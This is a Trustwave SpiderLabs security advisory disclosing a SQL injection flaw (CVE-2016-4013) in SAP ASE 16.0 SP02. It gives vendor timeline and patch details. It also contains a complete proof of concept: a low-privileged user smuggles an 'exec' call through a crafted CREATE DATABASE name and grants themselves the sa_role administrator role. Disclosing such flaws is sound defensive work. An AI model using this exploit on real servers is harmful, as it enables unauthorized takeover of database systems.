Trustwave SpiderLabs Security Advisory TWSL2016-008: SQL injection vulnerability in SAP ASE Published: 05/09/2016 Version: 1.0 Vendor: SAP (www.sap.com) Product: Adaptive Server Enterprise 16.0 Version affected: 16.0 SP02 Product description: Relational database management system for Linux, UNIX, Windows. Finding 1: SQL injection vulnerability in CREATE/ALTER DATABASE DSAM support logic Credit: Martin Rakhmanov of Trustwave CVE: CVE-2016-4013 SAP ASE 16.0 SP02 introduced feature called Data Store Access Management (DSAM). As a result, CREATE/ALTER DATABASE statements have been modified to do additional processing for DSAM. Specifically, they try to add specially named segments if DSAM is configured. There is a flaw in these statements' implementation allowing low privileged users embed T-SQL code that will be executed elevated resulting in complete server takeover. This attack requires DSAM being configured and certain privileges granted to the attacker, namely CREATE DATABASE and CREATE PROCEDURE as well as device with certain DSAM class as shown in proof-of-concept code below. As DBA, install the sybdsamdb database. Then add a user and grant initial privileges: 1> create login joe with passwd <...> 2> go 1> sp_adduser joe 2> go New user added. (return status = 0) 1> grant create database to joe 2> go 1> grant create procedure to joe 2> go As DBA, create device and set its class to some value from DSAMDeviceClasses: 1> disk init name = 'm2', physname = <...>, size='10M' 2> go 1> exec sybdsamdb..dsam_set_device_class 'm2', 'HI' 2> go Device 'm2' class changed from 'NULL' to 'HI'. (return status = 0) 1> quit As attacker create procedure and database: 1> create procedure u as grant role sa_role to joe 2> go 1> create database [a, m2 exec master.joe.u--] on m2 2> go Internally the server will execute SQL: exec sp_addsegment DSAM_device_class_HI, a, m2 exec master.joe.u--, m2 Reconnect as 'joe' and examine roles granted via sp_displayroles. Remediation Steps: Apply the SAP ASE 16.0 SP02 PL03 vendor supplied patch. Revision History: 12/02/2015 - Vulnerability disclosed to vendor 04/12/2016 - Patch released by vendor 05/09/2016 - Advisory published References 1. https://websmp230.sap-ag.de/sap/support/notes/2294689 About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risks. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs while safely embracing business imperatives including big data, BYOD and social media. More than 2.5 million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective data protection, risk management and threat intelligence. Trustwave is a privately held company, headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.